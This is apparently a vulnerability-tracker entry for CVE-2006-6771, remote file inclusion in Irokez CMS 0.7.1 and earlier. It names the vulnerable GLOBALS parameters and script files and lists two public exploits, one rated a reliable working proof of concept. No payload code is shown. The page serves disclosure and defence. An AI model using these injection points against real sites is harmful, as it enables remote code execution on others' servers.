CVE-2006-6771

Irokez CMS < 0.7.1 - Remote File Inclusion via Multiple PHP Script Parameters

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 2 public exploits for CVE-2006-6771. PoCs published by Corwin, nuffsaid.

AI-analyzed exploit summary The provided text describes multiple vulnerabilities in Irokez Blog 0.7.3.2, including XSS, SQL injection, and remote file inclusion. It includes example payloads for exploitation but lacks executable code.

Description

Multiple PHP remote file inclusion vulnerabilities in Irokez CMS 0.7.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[PTH][func] parameter in (a) scripts/gallery.scr.php; the (2) GLOBALS[PTH][spaw] parameter in (b) scripts/xtextarea.scr.php; and the (3) GLOBALS[PTH][classes] parameter in (c) sitemap.scr.php, (d) news.scr.php, (e) polls.scr.php, (f) rss.scr.php, (g) search.scr.php in scripts/, and (h) form.fun.php, (i) general.func.php, (j) groups.func.php, (k) js.func.php, (l) sections.func.php, and (m) users.func.php in functions/.

Exploits (2)

exploitdb WRITEUP VERIFIED
by Corwin · textwebappsphp
https://www.exploit-db.com/exploits/32823

The provided text describes multiple vulnerabilities in Irokez Blog 0.7.3.2, including XSS, SQL injection, and remote file inclusion. It includes example payloads for exploitation but lacks executable code.

Classification
Writeup 90%
Attack Type
Sqli | Xss | Other
Complexity
Trivial
Reliability
Theoretical
Target: Irokez Blog 0.7.3.2
No auth needed
Prerequisites: Access to vulnerable Irokez Blog instance
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WORKING POC VERIFIED
by nuffsaid · textwebappsphp
https://www.exploit-db.com/exploits/3007

This exploit demonstrates multiple remote file inclusion vulnerabilities in Irokez CMS <= 0.7.1 due to uninitialized variables used in file inclusion paths. The PoC provides URLs to inject remote PHP files via query strings, leveraging register_globals being enabled.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: Irokez CMS <= 0.7.1
No auth needed
Prerequisites: register_globals = on · remote file inclusion allowed in PHP configuration
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (4)

Core 4
Core References
Exploit vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/21769
Third Party Advisory vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2006/5178
Exploit, Third Party Advisory exploit x_refsource_exploit-db
https://www.exploit-db.com/exploits/3007
Exploit, Vendor Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/23497

Scores

EPSS 0.0215
EPSS Percentile 79.7%

Details

Status published
Products (1)
irokez/irokez_cms < 0.7.1
Published Dec 27, 2006
Tracked Since Feb 18, 2026